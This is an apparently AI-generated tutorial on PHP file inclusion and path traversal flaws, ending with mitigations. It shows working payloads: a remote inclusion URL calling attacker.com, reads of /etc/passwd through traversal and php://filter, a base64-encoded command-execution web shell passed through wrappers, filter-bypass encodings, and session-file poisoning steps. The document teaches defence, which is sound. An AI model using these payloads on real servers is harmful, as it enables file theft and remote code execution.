Understanding File Inclusion and Path Traversal
This content is an AI-generated summary. If you encounter any misinformation or problematic content, please report it to cyb.hub@proton.me.
File Inclusion and Path Traversal are critical vulnerabilities that occur when an application allows external input to alter the path for accessing files. These vulnerabilities can lead to unauthorized access to sensitive files or the execution of malicious code.
Key Points
- File Inclusion: Allows attackers to include remote or local files.
- Path Traversal: Enables attackers to access files outside the intended directory.
- PHP Wrappers: Can be exploited to access or execute code through built-in PHP protocols.
- Base Directory Breakout: Techniques used to traverse directories and access unauthorized files.
- Log Poisoning: Injecting executable code into log files to exploit LFI vulnerabilities.
Types of File Inclusion
Remote File Inclusion (RFI)
RFI allows attackers to include remote files, often through input manipulation.
- Example:
include.php?page=http://attacker.com/exploit.php
Local File Inclusion (LFI)
LFI occurs when an attacker exploits vulnerable input fields to access or execute files on the server.
- Example:
include.php?page=../../../../etc/passwd
PHP Wrappers
PHP wrappers allow access to various data streams, which can lead to significant security risks if not properly handled.
Examples of PHP Wrappers
php://filter: Can be used to encode or decode file contents.- Example:
php://filter/convert.base64-encode/resource=/etc/passwd
- Example:
data://: Can execute PHP code.- Example:
data:text/plain,<?php%20phpinfo();%20?>
- Example:
Categories of Filters in PHP
| Category | Examples |
|---|---|
| String Filters | string.rot13, string.toupper, string.tolower, string.strip_tags |
| Conversion Filters | convert.base64-encode, convert.base64-decode, convert.quoted-printable-encode, convert.quoted-printable-decode |
| Compression Filters | zlib.deflate, zlib.inflate |
| Encryption Filters | mcrypt, mdecrypt (deprecated) |
Code Execution Example
- Payload:
php://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+ - Executes:
<?php system($_GET['cmd']); echo 'Shell done!'; ?>
Base Directory Breakout
Attackers use various techniques to bypass security filters and access unauthorized files.
Obfuscation Techniques
- Standard URL Encoding:
../becomes%2e%2e%2f - Double Encoding: Useful if the application decodes inputs twice.
../becomes%252e%252e%252f - Obfuscation: Payloads like
....//to avoid detection by simple string matching.
PHP Session Files
PHP session files can be exploited in LFI attacks, leading to Remote Code Execution if an attacker manipulates the session data.
Example
- Send
<?php echo phpinfo(); ?>into a vulnerable input. - Get the session into the storage tab of the console.
- Access
sessions.php?page=/var/lib/php/sessions/sess_966t4v1ki316ham5q33sbblq3m.
Log Poisoning
Log poisoning involves injecting executable code into a web server's log file and then using an LFI vulnerability to include and execute this log file.
Mitigation Strategies
- Validate and Sanitize Inputs: Ensure all user inputs are properly validated and sanitized.
- Implement Allowlisting: Use allowlisting for file inclusion and access.
- Configure Server Settings: Disallow remote file inclusion and limit script access to the filesystem.
- Regular Code Reviews: Perform regular code reviews and security audits.
- Security Awareness: Ensure everyone involved in the development process understands the importance of security.
Learn More
For more detailed information on these vulnerabilities and how to protect against them, consider exploring resources on secure coding practices and web application security.